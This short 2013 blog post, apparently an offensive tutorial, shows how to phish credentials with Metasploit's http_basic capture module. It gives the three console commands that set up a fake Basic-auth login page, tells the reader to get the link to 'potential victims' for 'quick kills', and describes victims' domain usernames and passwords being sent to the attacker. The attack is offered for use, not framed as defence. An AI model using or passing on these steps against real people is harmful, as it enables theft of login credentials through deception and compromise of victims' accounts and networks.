Thursday, 6 June 2013
METASPLOIT - Stealing Credentials (The Lazy Way)
In this example, we are going to show how easy it is to steal credentials through deception. Fire up our metasploit,
#msf > use auxiliary/server/capture/http_basic
#msf auxiliary(http_basic) > set URIPATH ClickMe
#msf auxiliary(http_basic) > exploit
A link will be generated and in this case its http://192.168.71.169:80/ClickMe. For quick kills, you need to find a way to provide this link to potential victims.
A username and password is asked. Typically, unknown victims will input their domain credentials. For this example, i used the username= 'windowsusername' and the password='domainpassword'.
When the victim clicks Log In, the credentials are being sent to the attacker!
*Test was done with Mcafee AV status updated and Windows Firewall On. :)